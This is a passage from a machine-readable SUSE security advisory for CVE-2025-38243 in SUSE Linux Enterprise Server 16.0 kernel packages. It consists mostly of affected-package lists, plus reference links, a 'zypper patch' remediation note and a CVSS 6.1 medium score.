"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
